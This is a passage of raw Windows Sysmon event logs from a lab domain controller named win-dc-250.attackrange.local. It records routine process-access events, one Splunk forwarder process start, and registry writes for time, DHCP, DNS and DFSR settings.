13:39:19.906{08A6967A-4287-6000-0C00-000000009A01}5883124C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000013958Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:39:19.906{08A6967A-4287-6000-0C00-000000009A01}5883124C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000013957Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:39:19.906{08A6967A-4286-6000-0500-000000009A01}636652C:\Windows\system32\csrss.exe{08A6967A-4987-6000-7D05-000000009A01}6984C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x800000000000000013956Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:39:19.906{08A6967A-4325-6000-B900-000000009A01}11763752C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{08A6967A-4987-6000-7D05-000000009A01}6984C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x800000000000000013955Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:39:19.907{08A6967A-4987-6000-7D05-000000009A01}6984C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe8.0.2Windows Print Monitor splunk ApplicationSplunk Inc.splunk-winprintmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{08A6967A-4286-6000-E703-000000000000}0x3e70SystemMD5=36D3753920C5BBCA16D12DEAD7A3A904,SHA256=EA17F69FB116CFA6ADC3CE07EBBAE3FD2CB221F25E3F7A9ADF3F15DA051831E2,IMPHASH=264D4B9546D98D77D97F569F55A0B748{08A6967A-4325-6000-B900-000000009A01}1176C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 13241300x800000000000000013963Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-SetValue2021-01-14 13:39:20.594{08A6967A-4288-6000-1100-000000009A01}1192C:\Windows\system32\svchost.exeHKLM\System\CurrentControlSet\Services\W32Time\Config\LastKnownGoodTimeQWORD (0x01d6ea7a-0xa9939e4e) 10341000x800000000000000013964Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:39:27.469{08A6967A-4286-6000-0B00-000000009A01}852100C:\Windows\system32\lsass.exe{08A6967A-4284-6000-0100-000000009A01}4System0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\kerberos.DLL+96fe2|C:\Windows\system32\kerberos.DLL+794d4|C:\Windows\system32\kerberos.DLL+144c9|C:\Windows\system32\lsasrv.dll+2e101|C:\Windows\system32\lsasrv.dll+2c2c4|C:\Windows\system32\lsasrv.dll+31819|C:\Windows\system32\lsasrv.dll+2f177|C:\Windows\system32\lsasrv.dll+2e101|C:\Windows\system32\lsasrv.dll+16cdd|C:\Windows\SYSTEM32\SspiSrv.dll+1a96|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e 13241300x800000000000000013978Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-SetValue2021-01-14 13:39:29.344{08A6967A-4288-6000-1200-000000009A01}1232C:\Windows\System32\svchost.exeHKLM\System\CurrentControlSet\Services\Tcpip\Parameters\Interfaces\{90869922-2fcf-4d43-859e-b22588a4ffef}\DhcpConnForceBroadcastFlagDWORD (0x00000000) 13241300x800000000000000013977Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-SetValue2021-01-14 13:39:29.344{08A6967A-4288-6000-1200-000000009A01}1232C:\Windows\System32\svchost.exeHKLM\System\CurrentControlSet\Services\Tcpip\Parameters\Interfaces\{90869922-2fcf-4d43-859e-b22588a4ffef}\IsServerNapAwareDWORD (0x00000000) 13241300x800000000000000013976Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-SetValue2021-01-14 13:39:29.344{08A6967A-4288-6000-1200-000000009A01}1232C:\Windows\System32\svchost.exeHKLM\System\CurrentControlSet\Services\Tcpip\Parameters\Interfaces\{90869922-2fcf-4d43-859e-b22588a4ffef}\AddressTypeDWORD (0x00000000) 13241300x800000000000000013975Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-SetValue2021-01-14 13:39:29.344{08A6967A-4288-6000-1200-000000009A01}1232C:\Windows\System32\svchost.exeHKLM\System\CurrentControlSet\Services\Tcpip\Parameters\Interfaces\{90869922-2fcf-4d43-859e-b22588a4ffef}\LeaseTerminatesTimeDWORD (0x600057a1) 13241300x800000000000000013974Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-SetValue2021-01-14 13:39:29.344{08A6967A-4288-6000-1200-000000009A01}1232C:\Windows\System32\svchost.exeHKLM\System\CurrentControlSet\Services\Tcpip\Parameters\Interfaces\{90869922-2fcf-4d43-859e-b22588a4ffef}\T2DWORD (0x600055df) 13241300x800000000000000013973Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-SetValue2021-01-14 13:39:29.344{08A6967A-4288-6000-1200-000000009A01}1232C:\Windows\System32\svchost.exeHKLM\System\CurrentControlSet\Services\Tcpip\Parameters\Interfaces\{90869922-2fcf-4d43-859e-b22588a4ffef}\T1DWORD (0x60005099) 13241300x800000000000000013972Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-SetValue2021-01-14 13:39:29.344{08A6967A-4288-6000-1200-000000009A01}1232C:\Windows\System32\svchost.exeHKLM\System\CurrentControlSet\Services\Tcpip\Parameters\Interfaces\{90869922-2fcf-4d43-859e-b22588a4ffef}\LeaseObtainedTimeDWORD (0x60004991) 13241300x800000000000000013971Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-SetValue2021-01-14 13:39:29.344{08A6967A-4288-6000-1200-000000009A01}1232C:\Windows\System32\svchost.exeHKLM\System\CurrentControlSet\Services\Tcpip\Parameters\Interfaces\{90869922-2fcf-4d43-859e-b22588a4ffef}\LeaseDWORD (0x00000e10) 13241300x800000000000000013970Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-SetValue2021-01-14 13:39:29.344{08A6967A-4288-6000-1200-000000009A01}1232C:\Windows\System32\svchost.exeHKLM\System\CurrentControlSet\Services\Tcpip\Parameters\Interfaces\{90869922-2fcf-4d43-859e-b22588a4ffef}\DhcpServer10.0.1.1 13241300x800000000000000013969Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-SetValue2021-01-14 13:39:29.344{08A6967A-4288-6000-1200-000000009A01}1232C:\Windows\System32\svchost.exeHKLM\System\CurrentControlSet\Services\Tcpip\Parameters\Interfaces\{90869922-2fcf-4d43-859e-b22588a4ffef}\DhcpSubnetMask255.255.255.0 13241300x800000000000000013968Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-SetValue2021-01-14 13:39:29.344{08A6967A-4288-6000-1200-000000009A01}1232C:\Windows\System32\svchost.exeHKLM\System\CurrentControlSet\Services\Tcpip\Parameters\Interfaces\{90869922-2fcf-4d43-859e-b22588a4ffef}\DhcpIPAddress10.0.1.14 13241300x800000000000000013967Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-SetValue2021-01-14 13:39:29.344{08A6967A-4288-6000-1200-000000009A01}1232C:\Windows\System32\svchost.exeHKLM\System\CurrentControlSet\Services\Tcpip\Parameters\Interfaces\{90869922-2fcf-4d43-859e-b22588a4ffef}\DhcpInterfaceOptionsBinary Data 10341000x800000000000000013966Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:39:29.109{08A6967A-4288-6000-1000-000000009A01}11367148C:\Windows\system32\svchost.exe{08A6967A-4298-6000-3300-000000009A01}2812C:\Windows\system32\DFSRs.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\wmiprvsd.dll+2a2f2|C:\Windows\system32\wbem\wmiprvsd.dll+29e26|C:\Windows\system32\wbem\wmiprvsd.dll+28432|C:\Windows\system32\wbem\wmiprvsd.dll+57817|C:\Windows\system32\wbem\wmiprvsd.dll+8a475|C:\Windows\system32\wbem\wbemcore.dll+bcb3|C:\Windows\system32\wbem\wbemcore.dll+3393|C:\Windows\system32\wbem\wbemcore.dll+22adf|C:\Windows\system32\wbem\wbemcore.dll+22a19|C:\Windows\system32\wbem\wbemcore.dll+21f5a|C:\Windows\system32\wbem\wbemcore.dll+2c9be|C:\Windows\system32\wbem\wbemcore.dll+202d8|C:\Windows\system32\wbem\wbemcore.dll+390e|C:\Windows\system32\wbem\wbemcore.dll+22bba|C:\Windows\system32\wbem\wbemcore.dll+22a19|C:\Windows\system32\wbem\wbemcore.dll+21f5a|C:\Windows\system32\wbem\wbemcore.dll+22711|C:\Windows\system32\wbem\wbemcore.dll+2d78c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000013965Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:39:29.109{08A6967A-4288-6000-1000-000000009A01}11367148C:\Windows\system32\svchost.exe{08A6967A-4298-6000-3300-000000009A01}2812C:\Windows\system32\DFSRs.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\wmiprvsd.dll+2597b|C:\Windows\system32\wbem\wmiprvsd.dll+283dc|C:\Windows\system32\wbem\wmiprvsd.dll+57817|C:\Windows\system32\wbem\wmiprvsd.dll+8a475|C:\Windows\system32\wbem\wbemcore.dll+bcb3|C:\Windows\system32\wbem\wbemcore.dll+3393|C:\Windows\system32\wbem\wbemcore.dll+22adf|C:\Windows\system32\wbem\wbemcore.dll+22a19|C:\Windows\system32\wbem\wbemcore.dll+21f5a|C:\Windows\system32\wbem\wbemcore.dll+2c9be|C:\Windows\system32\wbem\wbemcore.dll+202d8|C:\Windows\system32\wbem\wbemcore.dll+390e|C:\Windows\system32\wbem\wbemcore.dll+22bba|C:\Windows\system32\wbem\wbemcore.dll+22a19|C:\Windows\system32\wbem\wbemcore.dll+21f5a|C:\Windows\system32\wbem\wbemcore.dll+22711|C:\Windows\system32\wbem\wbemcore.dll+2d78c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 13241300x800000000000000013992Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-SetValue2021-01-14 13:39:31.375{08A6967A-4288-6000-1500-000000009A01}1324C:\Windows\system32\svchost.exeHKLM\System\CurrentControlSet\Services\Tcpip\Parameters\DNSRegisteredAdapters\{90869922-2FCF-4D43-859E-B22588A4FFEF}\RegisteredSinceBootDWORD (0x00000001) 13241300x800000000000000013991Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-SetValue2021-01-14 13:39:31.375{08A6967A-4288-6000-1500-000000009A01}1324C:\Windows\system32\svchost.exeHKLM\System\CurrentControlSet\Services\Tcpip\Parameters\DNSRegisteredAdapters\{90869922-2FCF-4D43-859E-B22588A4FFEF}\StaleAdapterDWORD (0x00000000) 13241300x800000000000000013990Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-SetValue2021-01-14 13:39:31.375{08A6967A-4288-6000-1500-000000009A01}1324C:\Windows\system32\svchost.exeHKLM\System\CurrentControlSet\Services\Tcpip\Parameters\DNSRegisteredAdapters\{90869922-2FCF-4D43-859E-B22588A4FFEF}\CompartmentIdDWORD (0x00000001) 13241300x800000000000000013989Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-SetValue2021-01-14 13:39:31.375{08A6967A-4288-6000-1500-000000009A01}1324C:\Windows\system32\svchost.exeHKLM\System\CurrentControlSet\Services\Tcpip\Parameters\DNSRegisteredAdapters\{90869922-2FCF-4D43-859E-B22588A4FFEF}\FlagsDWORD (0x00000002) 13241300x800000000000000013988Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-SetValue2021-01-14 13:39:31.375{08A6967A-4288-6000-1500-000000009A01}1324C:\Windows\system32\svchost.exeHKLM\System\CurrentControlSet\Services\Tcpip\Parameters\DNSRegisteredAdapters\{90869922-2FCF-4D43-859E-B22588A4FFEF}\TtlDWORD (0x000004b0) 13241300x800000000000000013987Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-SetValue2021-01-14 13:39:31.375{08A6967A-4288-6000-1500-000000009A01}1324C:\Windows\system32\svchost.exeHKLM\System\CurrentControlSet\Services\Tcpip\Parameters\DNSRegisteredAdapters\{90869922-2FCF-4D43-859E-B22588A4FFEF}\SentPriUpdateToIpBinary Data 13241300x800000000000000013986Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-SetValue2021-01-14 13:39:31.375{08A6967A-4288-6000-1500-000000009A01}1324C:\Windows\system32\svchost.exeHKLM\System\CurrentControlSet\Services\Tcpip\Parameters\DNSRegisteredAdapters\{90869922-2FCF-4D43-859E-B22588A4FFEF}\SentUpdateToIpBinary Data 13241300x800000000000000013985Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-SetValue2021-01-14 13:39:31.375{08A6967A-4288-6000-1500-000000009A01}1324C:\Windows\system32\svchost.exeHKLM\System\CurrentControlSet\Services\Tcpip\Parameters\DNSRegisteredAdapters\{90869922-2FCF-4D43-859E-B22588A4FFEF}\DnsServersBinary Data 13241300x800000000000000013984Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-SetValue2021-01-14 13:39:31.375{08A6967A-4288-6000-1500-000000009A01}1324C:\Windows\system32\svchost.exeHKLM\System\CurrentControlSet\Services\Tcpip\Parameters\DNSRegisteredAdapters\{90869922-2FCF-4D43-859E-B22588A4FFEF}\HostAddrsBinary Data 13241300x800000000000000013983Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-SetValue2021-01-14 13:39:31.375{08A6967A-4288-6000-1500-000000009A01}1324C:\Windows\system32\svchost.exeHKLM\System\CurrentControlSet\Services\Tcpip\Parameters\DNSRegisteredAdapters\{90869922-2FCF-4D43-859E-B22588A4FFEF}\PrimaryDomainNameattackrange.local 13241300x800000000000000013982Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-SetValue2021-01-14 13:39:31.375{08A6967A-4288-6000-1500-000000009A01}1324C:\Windows\system32\svchost.exeHKLM\System\CurrentControlSet\Services\Tcpip\Parameters\DNSRegisteredAdapters\{90869922-2FCF-4D43-859E-B22588A4FFEF}\AdapterDomainName(Empty) 13241300x800000000000000013981Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-SetValue2021-01-14 13:39:31.375{08A6967A-4288-6000-1500-000000009A01}1324C:\Windows\system32\svchost.exeHKLM\System\CurrentControlSet\Services\Tcpip\Parameters\DNSRegisteredAdapters\{90869922-2FCF-4D43-859E-B22588A4FFEF}\Hostnamewin-dc-250 10341000x800000000000000013980Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:39:31.375{08A6967A-4286-6000-0B00-000000009A01}852100C:\Windows\system32\lsass.exe{08A6967A-4288-6000-1500-000000009A01}1324C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\kerberos.DLL+96fe2|C:\Windows\system32\kerberos.DLL+794d4|C:\Windows\system32\kerberos.DLL+144c9|C:\Windows\system32\lsasrv.dll+2e101|C:\Windows\system32\lsasrv.dll+2c2c4|C:\Windows\system32\lsasrv.dll+31375|C:\Windows\system32\lsasrv.dll+2f20b|C:\Windows\system32\lsasrv.dll+2e101|C:\Windows\system32\lsasrv.dll+16cdd|C:\Windows\SYSTEM32\SspiSrv.dll+1a96|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e 13241300x800000000000000013979Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-SetValue2021-01-14 13:39:31.375{08A6967A-4288-6000-1500-000000009A01}1324C:\Windows\system32\svchost.exeHKLM\System\CurrentControlSet\Services\Tcpip\Parameters\DNSRegisteredAdapters\{90869922-2FCF-4D43-859E-B22588A4FFEF}\RegisteredSinceBootDWORD (0x00000001) 13241300x800000000000000014002Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-SetValue2021-01-14 13:39:54.579{08A6967A-4286-6000-0B00-000000009A01}852C:\Windows\system32\lsass.exeHKLM\System\CurrentControlSet\Services\W32Time\SecureTimeLimits\RunTime\SecureTimeConfidenceDWORD (0x00000006) 13241300x800000000000000014001Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-SetValue2021-01-14 13:39:54.579{08A6967A-4286-6000-0B00-000000009A01}852C:\Windows\system32\lsass.exeHKLM\System\CurrentControlSet\Services\W32Time\SecureTimeLimits\RunTime\SecureTimeTickCountQWORD (0x00000000-0x001bfb16) 13241300x800000000000000014000Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-SetValue2021-01-14 13:39:54.579{08A6967A-4286-6000-0B00-000000009A01}852C:\Windows\system32\lsass.exeHKLM\System\CurrentControlSet\Services\W32Time\SecureTimeLimits\SecureTimeLowQWORD (0x01d6ea72-0x5bd40b51) 13241300x800000000000000013999Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-SetValue2021-01-14 13:39:54.579{08A6967A-4286-6000-0B00-000000009A01}852C:\Windows\system32\lsass.exeHKLM\System\CurrentControlSet\Services\W32Time\SecureTimeLimits\SecureTimeEstimatedQWORD (0x01d6ea7a-0xbd987351) 13241300x800000000000000013998Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-SetValue2021-01-14 13:39:54.579{08A6967A-4286-6000-0B00-000000009A01}852C:\Windows\system32\lsass.exeHKLM\System\CurrentControlSet\Services\W32Time\SecureTimeLimits\SecureTimeHighQWORD (0x01d6ea83-0x1f5cdb51) 13241300x800000000000000013997Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-SetValue2021-01-14 13:39:54.579{08A6967A-4286-6000-0B00-000000009A01}852C:\Windows\system32\lsass.exeHKLM\System\CurrentControlSet\Services\W32Time\SecureTimeLimits\RunTime\SecureTimeConfidenceDWORD (0x00000006) 13241300x800000000000000013996Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-SetValue2021-01-14 13:39:54.579{08A6967A-4286-6000-0B00-000000009A01}852C:\Windows\system32\lsass.exeHKLM\System\CurrentControlSet\Services\W32Time\SecureTimeLimits\RunTime\SecureTimeTickCountQWORD (0x00000000-0x001bfb16) 13241300x800000000000000013995Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-SetValue2021-01-14 13:39:54.579{08A6967A-4286-6000-0B00-000000009A01}852C:\Windows\system32\lsass.exeHKLM\System\CurrentControlSet\Services\W32Time\SecureTimeLimits\SecureTimeLowQWORD (0x01d6ea72-0x5bd40b51) 13241300x800000000000000013994Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-SetValue2021-01-14 13:39:54.579{08A6967A-4286-6000-0B00-000000009A01}852C:\Windows\system32\lsass.exeHKLM\System\CurrentControlSet\Services\W32Time\SecureTimeLimits\SecureTimeEstimatedQWORD (0x01d6ea7a-0xbd987351) 13241300x800000000000000013993Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-SetValue2021-01-14 13:39:54.579{08A6967A-4286-6000-0B00-000000009A01}852C:\Windows\system32\lsass.exeHKLM\System\CurrentControlSet\Services\W32Time\SecureTimeLimits\SecureTimeHighQWORD (0x01d6ea83-0x1f5cdb51) 10341000x800000000000000014003Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:39:56.798{08A6967A-4286-6000-0B00-000000009A01}852100C:\Windows\system32\lsass.exe{08A6967A-4284-6000-0100-000000009A01}4System0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\kerberos.DLL+96fe2|C:\Windows\system32\kerberos.DLL+794d4|C:\Windows\system32\kerberos.DLL+144c9|C:\Windows\system32\lsasrv.dll+2e101|C:\Windows\system32\lsasrv.dll+2c2c4|C:\Windows\system32\lsasrv.dll+31819|C:\Windows\system32\lsasrv.dll+2f177|C:\Windows\system32\lsasrv.dll+2e101|C:\Windows\system32\lsasrv.dll+16cdd|C:\Windows\SYSTEM32\SspiSrv.dll+1a96|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e 13241300x800000000000000014006Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-SetValue2021-01-14 13:40:01.563{08A6967A-4298-6000-3300-000000009A01}2812C:\Windows\system32\DFSRs.exeHKLM\System\CurrentControlSet\Services\DFSR\Parameters\Volumes\E353614F-0000-0000-0000-100000000000\Volume Configuration File\\.\C:\System Volume Information\DFSR\Config\Volume_E353614F-0000-0000-0000-100000000000.XML 13241300x800000000000000014005Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-SetValue2021-01-14 13:40:01.548{08A6967A-4298-6000-3300-000000009A01}2812C:\Windows\system32\DFSRs.exeHKLM\System\CurrentControlSet\Services\DFSR\Parameters\Replication Groups\2F6F85D1-BD71-4F32-93CC-49B3DCE2851F\Config SourceDWORD (0x00000001) 13241300x800000000000000014004Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-SetValue2021-01-14 13:40:01.548{08A6967A-4298-6000-3300-000000009A01}2812C:\Windows\system32\DFSRs.exeHKLM\System\CurrentControlSet\Services\DFSR\Parameters\Replication Groups\2F6F85D1-BD71-4F32-93CC-49B3DCE2851F\Replica Set Configuration File\\?\C:\System Volume Information\DFSR\Config\Replica_2F6F85D1-BD71-4F32-93CC-49B3DCE2851F.XML 10341000x800000000000000014008Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:40:11.517{08A6967A-4287-6000-0C00-000000009A01}5883124C:\Windows\system32\svchost.exe{08A6967A-4754-6000-1705-000000009A01}3408C:\Windows\Explorer.EXE0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+f86b|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000014007Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:40:11.517{08A6967A-4287-6000-0C00-000000009A01}5883124C:\Windows\system32\svchost.exe{08A6967A-4754-6000-1705-000000009A01}3408C:\Windows\Explorer.EXE0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+f71b|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 13241300x800000000000000014009Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-SetValue2021-01-14 13:40:12.845{08A6967A-4288-6000-1100-000000009A01}1192C:\Windows\system32\svchost.exeHKLM\System\CurrentControlSet\Services\W32Time\Config\LastKnownGoodTimeQWORD (0x01d6ea7a-0xc8b885b3) 10341000x800000000000000014025Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:40:15.923{08A6967A-4325-6000-BD00-000000009A01}30161356C:\Windows\system32\conhost.exe{08A6967A-49BF-6000-7F05-000000009A01}4972C:\Program 